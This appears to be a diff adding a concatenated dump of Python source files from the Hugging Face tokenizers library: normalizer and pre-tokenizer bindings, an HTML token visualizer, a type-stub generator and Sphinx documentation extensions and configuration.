+ NFC = normalizers.NFC
455
+ NFKC = normalizers.NFKC
456
+ Sequence = normalizers.Sequence
457
+ Lowercase = normalizers.Lowercase
458
+ Prepend = normalizers.Prepend
459
+ Strip = normalizers.Strip
460
+ StripAccents = normalizers.StripAccents
461
+ Nmt = normalizers.Nmt
462
+ Precompiled = normalizers.Precompiled
463
+ Replace = normalizers.Replace
464
+ ByteLevel = normalizers.ByteLevel
465
+ NORMALIZERS = {'nfc': NFC, 'nfd': NFD, 'nfkc': NFKC, 'nfkd': NFKD}
466
+
467
+ def unicode_normalizer_from_str(normalizer: str) -> Normalizer:
468
+ if normalizer not in NORMALIZERS:
469
+ raise ValueError('{} is not a known unicode normalizer. Available are {}'.format(normalizer, NORMALIZERS.keys()))
470
+ return NORMALIZERS[normalizer]()
471
+
472
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/pre_tokenizers/__init__.py
473
+ from .. import pre_tokenizers
474
+ PreTokenizer = pre_tokenizers.PreTokenizer
475
+ BertPreTokenizer = pre_tokenizers.BertPreTokenizer
476
+ ByteLevel = pre_tokenizers.ByteLevel
477
+ CharDelimiterSplit = pre_tokenizers.CharDelimiterSplit
478
+ Digits = pre_tokenizers.Digits
479
+ Metaspace = pre_tokenizers.Metaspace
480
+ Punctuation = pre_tokenizers.Punctuation
481
+ Sequence = pre_tokenizers.Sequence
482
+ Split = pre_tokenizers.Split
483
+ UnicodeScripts = pre_tokenizers.UnicodeScripts
484
+ Whitespace = pre_tokenizers.Whitespace
485
+ WhitespaceSplit = pre_tokenizers.WhitespaceSplit
486
+
487
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/tools/visualizer.py
488
+ import itertools
489
+ import os
490
+ import re
491
+ from string import Template
492
+ from typing import Any, Callable, Dict, List, NamedTuple, Optional, Tuple
493
+ from tokenizers import Encoding, Tokenizer
494
+ dirname = os.path.dirname(__file__)
495
+ css_filename = os.path.join(dirname, 'visualizer-styles.css')
496
+ with open(css_filename) as f:
497
+ css = f.read()
498
+
499
+ class Annotation:
500
+ start: int
501
+ end: int
502
+ label: int
503
+
504
+ def __init__(self, start: int, end: int, label: str):
505
+ self.start = start
506
+ self.end = end
507
+ self.label = label
508
+ AnnotationList = List[Annotation]
509
+ PartialIntList = List[Optional[int]]
510
+
511
+ class CharStateKey(NamedTuple):
512
+ token_ix: Optional[int]
513
+ anno_ix: Optional[int]
514
+
515
+ class CharState:
516
+ char_ix: Optional[int]
517
+
518
+ def __init__(self, char_ix):
519
+ self.char_ix = char_ix
520
+ self.anno_ix: Optional[int] = None
521
+ self.tokens: List[int] = []
522
+
523
+ @property
524
+ def token_ix(self):
525
+ return self.tokens[0] if len(self.tokens) > 0 else None
526
+
527
+ @property
528
+ def is_multitoken(self):
529
+ return len(self.tokens) > 1
530
+
531
+ def partition_key(self) -> CharStateKey:
532
+ return CharStateKey(token_ix=self.token_ix, anno_ix=self.anno_ix)
533
+
534
+ class Aligned:
535
+ pass
536
+
537
+ class EncodingVisualizer:
538
+ unk_token_regex = re.compile('(.{1}\x08)?(unk|oov)(\x08.{1})?', flags=re.IGNORECASE)
539
+
540
+ def __init__(self, tokenizer: Tokenizer, default_to_notebook: bool=True, annotation_converter: Optional[Callable[[Any], Annotation]]=None):
541
+ if default_to_notebook:
542
+ try:
543
+ from IPython.core.display import HTML, display
544
+ except ImportError:
545
+ raise Exception("We couldn't import IPython utils for html display.\n Are you running in a notebook?\n You can also pass `default_to_notebook=False` to get back raw HTML\n ")
546
+ self.tokenizer = tokenizer
547
+ self.default_to_notebook = default_to_notebook
548
+ self.annotation_coverter = annotation_converter
549
+ pass
550
+
551
+ def __call__(self, text: str, annotations: AnnotationList=[], default_to_notebook: Optional[bool]=None) -> Optional[str]:
552
+ final_default_to_notebook = self.default_to_notebook
553
+ if default_to_notebook is not None:
554
+ final_default_to_notebook = default_to_notebook
555
+ if final_default_to_notebook:
556
+ try:
557
+ from IPython.core.display import HTML, display
558
+ except ImportError:
559
+ raise Exception("We couldn't import IPython utils for html display.\n Are you running in a notebook?")
560
+ if self.annotation_coverter is not None:
561
+ annotations = list(map(self.annotation_coverter, annotations))
562
+ encoding = self.tokenizer.encode(text)
563
+ html = EncodingVisualizer.__make_html(text, encoding, annotations)
564
+ if final_default_to_notebook:
565
+ display(HTML(html))
566
+ else:
567
+ return html
568
+
569
+ @staticmethod
570
+ def calculate_label_colors(annotations: AnnotationList) -> Dict[str, str]:
571
+ if len(annotations) == 0:
572
+ return {}
573
+ labels = set(map(lambda x: x.label, annotations))
574
+ num_labels = len(labels)
575
+ h_step = int(255 / num_labels)
576
+ if h_step < 20:
577
+ h_step = 20
578
+ s = 32
579
+ l = 64
580
+ h = 10
581
+ colors = {}
582
+ for label in sorted(labels):
583
+ colors[label] = f'hsl({h},{s}%,{l}%'
584
+ h += h_step
585
+ return colors
586
+
587
+ @staticmethod
588
+ def consecutive_chars_to_html(consecutive_chars_list: List[CharState], text: str, encoding: Encoding):
589
+ first = consecutive_chars_list[0]
590
+ if first.char_ix is None:
591
+ stoken = encoding.tokens[first.token_ix]
592
+ return f'<span class="special-token" data-stoken={stoken}></span>'
593
+ last = consecutive_chars_list[-1]
594
+ start = first.char_ix
595
+ end = last.char_ix + 1
596
+ span_text = text[start:end]
597
+ css_classes = []
598
+ data_items = {}
599
+ if first.token_ix is not None:
600
+ css_classes.append('token')
601
+ if first.is_multitoken:
602
+ css_classes.append('multi-token')
603
+ if first.token_ix % 2:
604
+ css_classes.append('odd-token')
605
+ else:
606
+ css_classes.append('even-token')
607
+ if EncodingVisualizer.unk_token_regex.search(encoding.tokens[first.token_ix]) is not None:
608
+ css_classes.append('special-token')
609
+ data_items['stok'] = encoding.tokens[first.token_ix]
610
+ else:
611
+ css_classes.append('non-token')
612
+ css = f'''class="{' '.join(css_classes)}"'''
613
+ data = ''
614
+ for (key, val) in data_items.items():
615
+ data += f' data-{key}="{val}"'
616
+ return f'<span {css} {data} >{span_text}</span>'
617
+
618
+ @staticmethod
619
+ def __make_html(text: str, encoding: Encoding, annotations: AnnotationList) -> str:
620
+ char_states = EncodingVisualizer.__make_char_states(text, encoding, annotations)
621
+ current_consecutive_chars = [char_states[0]]
622
+ prev_anno_ix = char_states[0].anno_ix
623
+ spans = []
624
+ label_colors_dict = EncodingVisualizer.calculate_label_colors(annotations)
625
+ cur_anno_ix = char_states[0].anno_ix
626
+ if cur_anno_ix is not None:
627
+ anno = annotations[cur_anno_ix]
628
+ label = anno.label
629
+ color = label_colors_dict[label]
630
+ spans.append(f'<span class="annotation" style="color:{color}" data-label="{label}">')
631
+ for cs in char_states[1:]:
632
+ cur_anno_ix = cs.anno_ix
633
+ if cur_anno_ix != prev_anno_ix:
634
+ spans.append(EncodingVisualizer.consecutive_chars_to_html(current_consecutive_chars, text=text, encoding=encoding))
635
+ current_consecutive_chars = [cs]
636
+ if prev_anno_ix is not None:
637
+ spans.append('</span>')
638
+ if cur_anno_ix is not None:
639
+ anno = annotations[cur_anno_ix]
640
+ label = anno.label
641
+ color = label_colors_dict[label]
642
+ spans.append(f'<span class="annotation" style="color:{color}" data-label="{label}">')
643
+ prev_anno_ix = cur_anno_ix
644
+ if cs.partition_key() == current_consecutive_chars[0].partition_key():
645
+ current_consecutive_chars.append(cs)
646
+ else:
647
+ spans.append(EncodingVisualizer.consecutive_chars_to_html(current_consecutive_chars, text=text, encoding=encoding))
648
+ current_consecutive_chars = [cs]
649
+ spans.append(EncodingVisualizer.consecutive_chars_to_html(current_consecutive_chars, text=text, encoding=encoding))
650
+ res = HTMLBody(spans)
651
+ return res
652
+
653
+ @staticmethod
654
+ def __make_anno_map(text: str, annotations: AnnotationList) -> PartialIntList:
655
+ annotation_map = [None] * len(text)
656
+ for (anno_ix, a) in enumerate(annotations):
657
+ for i in range(a.start, a.end):
658
+ annotation_map[i] = anno_ix
659
+ return annotation_map
660
+
661
+ @staticmethod
662
+ def __make_char_states(text: str, encoding: Encoding, annotations: AnnotationList) -> List[CharState]:
663
+ annotation_map = EncodingVisualizer.__make_anno_map(text, annotations)
664
+ char_states: List[CharState] = [CharState(char_ix) for char_ix in range(len(text))]
665
+ for (token_ix, token) in enumerate(encoding.tokens):
666
+ offsets = encoding.token_to_chars(token_ix)
667
+ if offsets is not None:
668
+ (start, end) = offsets
669
+ for i in range(start, end):
670
+ char_states[i].tokens.append(token_ix)
671
+ for (char_ix, anno_ix) in enumerate(annotation_map):
672
+ char_states[char_ix].anno_ix = anno_ix
673
+ return char_states
674
+
675
+ def HTMLBody(children: List[str], css_styles=css) -> str:
676
+ children_text = ''.join(children)
677
+ return f'\n <html>\n <head>\n <style>\n {css_styles}\n </style>\n </head>\n <body>\n <div class="tokenized-text" dir=auto>\n {children_text}\n </div>\n </body>\n </html>\n '
678
+
679
+ # File: tokenizers-main/bindings/python/stub.py
680
+ import argparse
681
+ import inspect
682
+ import os
683
+ from pathlib import Path
684
+ INDENT = ' ' * 4
685
+ GENERATED_COMMENT = '# Generated content DO NOT EDIT\n'
686
+
687
+ def do_indent(text: str, indent: str):
688
+ return text.replace('\n', f'\n{indent}')
689
+
690
+ def function(obj, indent, text_signature=None):
691
+ if text_signature is None:
692
+ text_signature = obj.__text_signature__
693
+ string = ''
694
+ string += f'{indent}def {obj.__name__}{text_signature}:\n'
695
+ indent += INDENT
696
+ string += f'{indent}"""\n'
697
+ string += f'{indent}{do_indent(obj.__doc__, indent)}\n'
698
+ string += f'{indent}"""\n'
699
+ string += f'{indent}pass\n'
700
+ string += '\n'
701
+ string += '\n'
702
+ return string
703
+
704
+ def member_sort(member):
705
+ if inspect.isclass(member):
706
+ value = 10 + len(inspect.getmro(member))
707
+ else:
708
+ value = 1
709
+ return value
710
+
711
+ def fn_predicate(obj):
712
+ value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj)
713
+ if value:
714
+ return obj.__doc__ and obj.__text_signature__ and (not obj.__name__.startswith('_'))
715
+ if inspect.isgetsetdescriptor(obj):
716
+ return obj.__doc__ and (not obj.__name__.startswith('_'))
717
+ return False
718
+
719
+ def get_module_members(module):
720
+ members = [member for (name, member) in inspect.getmembers(module) if not name.startswith('_') and (not inspect.ismodule(member))]
721
+ members.sort(key=member_sort)
722
+ return members
723
+
724
+ def pyi_file(obj, indent=''):
725
+ string = ''
726
+ if inspect.ismodule(obj):
727
+ string += GENERATED_COMMENT
728
+ members = get_module_members(obj)
729
+ for member in members:
730
+ string += pyi_file(member, indent)
731
+ elif inspect.isclass(obj):
732
+ indent += INDENT
733
+ mro = inspect.getmro(obj)
734
+ if len(mro) > 2:
735
+ inherit = f'({mro[1].__name__})'
736
+ else:
737
+ inherit = ''
738
+ string += f'class {obj.__name__}{inherit}:\n'
739
+ body = ''
740
+ if obj.__doc__:
741
+ body += f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n'
742
+ fns = inspect.getmembers(obj, fn_predicate)
743
+ if obj.__text_signature__:
744
+ body += f'{indent}def __init__{obj.__text_signature__}:\n'
745
+ body += f'{indent + INDENT}pass\n'
746
+ body += '\n'
747
+ for (name, fn) in fns:
748
+ body += pyi_file(fn, indent=indent)
749
+ if not body:
750
+ body += f'{indent}pass\n'
751
+ string += body
752
+ string += '\n\n'
753
+ elif inspect.isbuiltin(obj):
754
+ string += f'{indent}@staticmethod\n'
755
+ string += function(obj, indent)
756
+ elif inspect.ismethoddescriptor(obj):
757
+ string += function(obj, indent)
758
+ elif inspect.isgetsetdescriptor(obj):
759
+ string += f'{indent}@property\n'
760
+ string += function(obj, indent, text_signature='(self)')
761
+ else:
762
+ raise Exception(f'Object {obj} is not supported')
763
+ return string
764
+
765
+ def py_file(module, origin):
766
+ members = get_module_members(module)
767
+ string = GENERATED_COMMENT
768
+ string += f'from .. import {origin}\n'
769
+ string += '\n'
770
+ for member in members:
771
+ name = member.__name__
772
+ string += f'{name} = {origin}.{name}\n'
773
+ return string
774
+ import subprocess
775
+ from typing import List, Optional, Tuple
776
+
777
+ def do_ruff(code, is_pyi: bool):
778
+ command = ['ruff', 'format', '--config', 'pyproject.toml', '--silent', '-']
779
+ if is_pyi:
780
+ command.extend(['--stdin-filename', 'test.pyi'])
781
+ process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
782
+ (stdout, _) = process.communicate(input=code.encode('utf-8'))
783
+ return stdout.decode('utf-8')
784
+
785
+ def write(module, directory, origin, check=False):
786
+ submodules = [(name, member) for (name, member) in inspect.getmembers(module) if inspect.ismodule(member)]
787
+ filename = os.path.join(directory, '__init__.pyi')
788
+ pyi_content = pyi_file(module)
789
+ pyi_content = do_ruff(pyi_content, is_pyi=True)
790
+ os.makedirs(directory, exist_ok=True)
791
+ if check:
792
+ with open(filename, 'r') as f:
793
+ data = f.read()
794
+ assert data == pyi_content, f'The content of {filename} seems outdated, please run `python stub.py`'
795
+ else:
796
+ with open(filename, 'w') as f:
797
+ f.write(pyi_content)
798
+ filename = os.path.join(directory, '__init__.py')
799
+ py_content = py_file(module, origin)
800
+ py_content = do_ruff(py_content, is_pyi=False)
801
+ os.makedirs(directory, exist_ok=True)
802
+ is_auto = False
803
+ if not os.path.exists(filename):
804
+ is_auto = True
805
+ else:
806
+ with open(filename, 'r') as f:
807
+ line = f.readline()
808
+ if line == GENERATED_COMMENT:
809
+ is_auto = True
810
+ if is_auto:
811
+ if check:
812
+ with open(filename, 'r') as f:
813
+ data = f.read()
814
+ assert data == py_content, f'The content of {filename} seems outdated, please run `python stub.py`'
815
+ else:
816
+ with open(filename, 'w') as f:
817
+ f.write(py_content)
818
+ for (name, submodule) in submodules:
819
+ write(submodule, os.path.join(directory, name), f'{name}', check=check)
820
+ if __name__ == '__main__':
821
+ parser = argparse.ArgumentParser()
822
+ parser.add_argument('--check', action='store_true')
823
+ args = parser.parse_args()
824
+ import tokenizers
825
+ write(tokenizers.tokenizers, 'py_src/tokenizers/', 'tokenizers', check=args.check)
826
+
827
+ # File: tokenizers-main/docs/source/_ext/entities.py
828
+ from collections import defaultdict, abc
829
+ from typing import cast
830
+ from docutils import nodes
831
+ from docutils.parsers.rst import Directive
832
+ import sphinx
833
+ from sphinx.locale import _
834
+ from sphinx.util.docutils import SphinxDirective
835
+ from sphinx.errors import ExtensionError
836
+ from conf import languages as LANGUAGES
837
+ logger = sphinx.util.logging.getLogger(__name__)
838
+ GLOBALNAME = '$GLOBAL$'
839
+
840
+ def update(d, u):
841
+ for (k, v) in u.items():
842
+ if isinstance(v, abc.Mapping):
843
+ d[k] = update(d.get(k, {}), v)
844
+ else:
845
+ d[k] = v
846
+ return d
847
+
848
+ class EntityNode(nodes.General, nodes.Element):
849
+ pass
850
+
851
+ class EntitiesNode(nodes.General, nodes.Element):
852
+ pass
853
+
854
+ class AllEntities:
855
+
856
+ def __init__(self):
857
+ self.entities = defaultdict(dict)
858
+
859
+ @classmethod
860
+ def install(cls, env):
861
+ if not hasattr(env, 'entity_all_entities'):
862
+ entities = cls()
863
+ env.entity_all_entities = entities
864
+ return env.entity_all_entities
865
+
866
+ def merge(self, other):
867
+ self.entities.update(other.entities)
868
+
869
+ def purge(self, docname):
870
+ for env_docname in [GLOBALNAME, docname]:
871
+ self.entities[env_docname] = dict([(name, entity) for (name, entity) in self.entities[env_docname].items() if entity['docname'] != docname])
872
+
873
+ def _extract_entities(self, nodes):
874
+ pass
875
+
876
+ def _extract_options(self, nodes):
877
+ pass
878
+
879
+ def _add_entities(self, entities, language, is_global, docname):
880
+ scope = GLOBALNAME if is_global else docname
881
+ for entity in entities:
882
+ name = f"{language}-{entity['name']}"
883
+ content = entity['content']
884
+ if name in self.entities[scope]:
885
+ logger.warning(f'''Entity "{name}" has already been defined{(' globally' if is_global else '')}''', location=docname)
886
+ self.entities[scope][name] = {'docname': docname, 'content': content}
887
+
888
+ def _extract_global(self, nodes):
889
+ for node in nodes:
890
+ if node.tagname != 'field':
891
+ raise Exception(f'Expected a field, found {node.tagname}')
892
+ (name, _) = node.children
893
+ if name.tagname != 'field_name':
894
+ raise Exception(f'Expected a field name here, found {name_node.tagname}')
895
+ if str(name.children[0]) == 'global':
896
+ return True
897
+
898
+ def _extract_entities(self, nodes):
899
+ entities = []
900
+ for node in nodes:
901
+ if node.tagname != 'definition_list_item':
902
+ raise Exception(f'Expected a list item here, found {node.tagname}')
903
+ (name_node, content_node) = node.children
904
+ if name_node.tagname != 'term':
905
+ raise Exception(f'Expected a term here, found {name_node.tagname}')
906
+ if content_node.tagname != 'definition':
907
+ raise Exception(f'Expected a definition here, found {content_node.tagname}')
908
+ name = str(name_node.children[0])
909
+ if len(content_node.children) == 1 and content_node.children[0].tagname == 'paragraph':
910
+ content = content_node.children[0].children[0]
911
+ else:
912
+ content = content_node
913
+ entities.append({'name': name, 'content': content})
914
+ return entities
915
+
916
+ def extract(self, node, docname):
917
+ is_global = False
918
+ entities = []
919
+ language = None
920
+ for node in node.children:
921
+ if language is None and node.tagname != 'paragraph':
922
+ raise Exception(f'Expected language name:\n.. entities:: <LANGUAGE>')
923
+ elif language is None and node.tagname == 'paragraph':
924
+ language = str(node.children[0])
925
+ if language not in LANGUAGES:
926
+ raise Exception(f'Unknown language "{language}. Might be missing a newline after language"')
927
+ elif node.tagname == 'field_list':
928
+ is_global = self._extract_global(node.children)
929
+ elif node.tagname == 'definition_list':
930
+ entities.extend(self._extract_entities(node.children))
931
+ else:
932
+ raise Exception(f'Expected a list of terms/options, found {node.tagname}')
933
+ self._add_entities(entities, language, is_global, docname)
934
+
935
+ def resolve_pendings(self, app):
936
+ env = app.builder.env
937
+ updates = defaultdict(dict)
938
+ for env_docname in self.entities.keys():
939
+ for (name, entity) in self.entities[env_docname].items():
940
+ docname = entity['docname']
941
+ node = entity['content']
942
+ for node in node.traverse(sphinx.addnodes.pending_xref):
943
+ contnode = cast(nodes.TextElement, node[0].deepcopy())
944
+ newnode = None
945
+ typ = node['reftype']
946
+ target = node['reftarget']
947
+ refdoc = node.get('refdoc', docname)
948
+ domain = None
949
+ try:
950
+ if 'refdomain' in node and node['refdomain']:
951
+ try:
952
+ domain = env.domains[node['refdomain']]
953
+ except KeyError as exc:
954
+ raise NoUri(target, typ) from exc
955
+ newnode = domain.resolve_xref(env, refdoc, app.builder, typ, target, node, contnode)
956
+ except NoUri:
957
+ newnode = contnode
958
+ updates[env_docname][name] = {'docname': docname, 'content': newnode or contnode}
959
+ update(self.entities, updates)
960
+
961
+ def get(self, language, name, docname):
962
+ name = f'{language}-{name}'
963
+ if name in self.entities[docname]:
964
+ return self.entities[docname][name]
965
+ elif name in self.entities[GLOBALNAME]:
966
+ return self.entities[GLOBALNAME][name]
967
+ else:
968
+ return None
969
+
970
+ class EntitiesDirective(SphinxDirective):
971
+ has_content = True
972
+
973
+ def run(self):
974
+ content = nodes.definition_list()
975
+ self.state.nested_parse(self.content, self.content_offset, content)
976
+ try:
977
+ entities = AllEntities.install(self.env)
978
+ entities.extract(content, self.env.docname)
979
+ except Exception as err:
980
+ raise self.error(f'Malformed directive "entities": {err}')
981
+ return []
982
+
983
+ def entity_role(name, rawtext, text, lineno, inliner, options={}, content=[]):
984
+ node = EntityNode()
985
+ node.entity = text
986
+ return ([node], [])
987
+
988
+ def process_entity_nodes(app, doctree, docname):
989
+ env = app.builder.env
990
+ entities = AllEntities.install(env)
991
+ entities.resolve_pendings(app)
992
+ language = None
993
+ try:
994
+ language = next((l for l in LANGUAGES if l in app.tags))
995
+ except Exception:
996
+ logger.warning(f'No language tag specified, not resolving entities in {docname}')
997
+ for node in doctree.traverse(EntityNode):
998
+ if language is None:
999
+ node.replace_self(nodes.Text(_(node.entity), _(node.entity)))
1000
+ else:
1001
+ entity = entities.get(language, node.entity, docname)
1002
+ if entity is None:
1003
+ node.replace_self(nodes.Text(_(node.entity), _(node.entity)))
1004
+ logger.warning(f'Entity "{node.entity}" has not been defined', location=node)
1005
+ else:
1006
+ node.replace_self(entity['content'])
1007
+
1008
+ def purge_entities(app, env, docname):
1009
+ entities = AllEntities.install(env)
1010
+ entities.purge(docname)
1011
+
1012
+ def merge_entities(app, env, docnames, other):
1013
+ entities = AllEntities.install(env)
1014
+ other_entities = AllEntities.install(other)
1015
+ entities.merge(other_entities)
1016
+
1017
+ def setup(app):
1018
+ app.add_node(EntityNode)
1019
+ app.add_node(EntitiesNode)
1020
+ app.add_directive('entities', EntitiesDirective)
1021
+ app.add_role('entity', entity_role)
1022
+ app.connect('doctree-resolved', process_entity_nodes)
1023
+ app.connect('env-merge-info', merge_entities)
1024
+ app.connect('env-purge-doc', purge_entities)
1025
+ return {'version': '0.1', 'parallel_read_safe': True, 'parallel_write_safe': True}
1026
+
1027
+ # File: tokenizers-main/docs/source/_ext/rust_doc.py
1028
+ from docutils import nodes
1029
+ import sphinx
1030
+ from sphinx.locale import _
1031
+ from conf import rust_version
1032
+ logger = sphinx.util.logging.getLogger(__name__)
1033
+
1034
+ class RustRef:
1035
+
1036
+ def __call__(self, name, rawtext, text, lineno, inliner, options={}, content=[]):
1037
+ doctype = name.split('_')[1]
1038
+ parts = text.split('::')
1039
+ if text.startswith('~'):
1040
+ title = parts[-1]
1041
+ parts[0] = parts[0][1:]
1042
+ else:
1043
+ content = text
1044
+ link = self.base_link()
1045
+ if doctype == 'struct':
1046
+ (l, title) = self.make_struct_link(parts, title)
1047
+ if doctype == 'func':
1048
+ (l, title) = self.make_func_link(parts, title)
1049
+ if doctype == 'meth':
1050
+ (l, title) = self.make_meth_link(parts, title)
1051
+ if doctype == 'trait':
1052
+ (l, title) = self.make_trait_link(parts, title)
1053
+ link += l
1054
+ node = nodes.reference(internal=False, refuri=link, text=title)
1055
+ wrapper = nodes.literal(classes=['xref'])
1056
+ wrapper += node
1057
+ return ([wrapper], [])
1058
+
1059
+ def base_link(self):
1060
+ return f'https://docs.rs/tokenizers/{rust_version}'
1061
+
1062
+ def make_struct_link(self, parts, title):
1063
+ link = ''
1064
+ struct_name = parts[-1]
1065
+ path = parts[:-1]
1066
+ for p in path:
1067
+ link += f'/{p}'
1068
+ link += f'/struct.{struct_name}.html'
1069
+ return (link, title)
1070
+
1071
+ def make_func_link(self, parts, title):
1072
+ link = ''
1073
+ fn_name = parts[-1]
1074
+ path = parts[:-1]
1075
+ for p in path:
1076
+ link += f'/{p}'
1077
+ link += f'/fn.{fn_name}.html'
1078
+ return (link, title)
1079
+
1080
+ def make_meth_link(self, parts, title):
1081
+ meth_name = parts[-1]
1082
+ if meth_name.endswith('()'):
1083
+ meth_name = meth_name[:-2]
1084
+ (link, title) = self.make_struct_link(parts[:-1], title)
1085
+ link += f'#method.{meth_name}'
1086
+ if not title.endswith(')'):
1087
+ title += '()'
1088
+ return (link, title)
1089
+
1090
+ def make_trait_link(self, parts, title):
1091
+ link = ''
1092
+ trait_name = parts[-1]
1093
+ path = parts[:-1]
1094
+ for p in path:
1095
+ link += f'/{p}'
1096
+ link += f'/trait.{trait_name}.html'
1097
+ return (link, title)
1098
+
1099
+ def setup(app):
1100
+ app.add_role('rust_struct', RustRef())
1101
+ app.add_role('rust_func', RustRef())
1102
+ app.add_role('rust_meth', RustRef())
1103
+ app.add_role('rust_trait', RustRef())
1104
+ return {'version': '0.1', 'parallel_read_safe': True, 'parallel_write_safe': True}
1105
+
1106
+ # File: tokenizers-main/docs/source/_ext/toctree_tags.py
1107
+ import re
1108
+ from sphinx.directives.other import TocTree
1109
+
1110
+ class TocTreeTags(TocTree):
1111
+ hasPat = re.compile('^\\s*:(.+):(.+)$')
1112
+
1113
+ def filter_entries(self, entries):
1114
+ filtered = []
1115
+ for e in entries:
1116
+ m = self.hasPat.match(e)
1117
+ if m != None:
1118
+ if self.env.app.tags.has(m.groups()[0]):
1119
+ filtered.append(m.groups()[1])
1120
+ else:
1121
+ filtered.append(e)
1122
+ return filtered
1123
+
1124
+ def run(self):
1125
+ self.content = self.filter_entries(self.content)
1126
+ return super().run()
1127
+
1128
+ def setup(app):
1129
+ app.add_directive('toctree-tags', TocTreeTags)
1130
+ return {'version': '0.1'}
1131
+
1132
+ # File: tokenizers-main/docs/source/conf.py
1133
+ import os
1134
+ import sys
1135
+ sys.path.insert(0, os.path.abspath('./_ext'))
1136
+ sys.path.insert(0, os.path.abspath('.'))
1137
+ project = 'tokenizers'
1138
+ copyright = '2020, huggingface'
1139
+ author = 'huggingface'
1140
+ release = ''
1141
+ languages = ['node', 'rust', 'python']
1142
+ rust_version = 'latest'
1143
+ extensions = ['sphinx.ext.autodoc', 'sphinx.ext.napoleon', 'entities', 'rust_doc', 'toctree_tags']
1144
+ templates_path = ['_templates']
1145
+ exclude_patterns = []
1146
+ html_theme = 'sphinx_rtd_theme'
1147
+ html_theme_options = {'analytics_id': 'UA-83738774-2'}
1148
+ html_static_path = ['_static']
1149
+
1150
+ def setup(app):
1151
+ for language in languages:
1152
+ if not tags.has(language):
1153
+ exclude_patterns.append(f'tutorials/{language}/*')
1154
+ app.add_css_file('css/huggingface.css')
1155
+ app.add_css_file('css/code-snippets.css')
1156
+ app.add_js_file('js/custom.js')
1157
+
huggingface_transformers-bloom-inference.txt ADDED
@@ -0,0 +1,1235 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
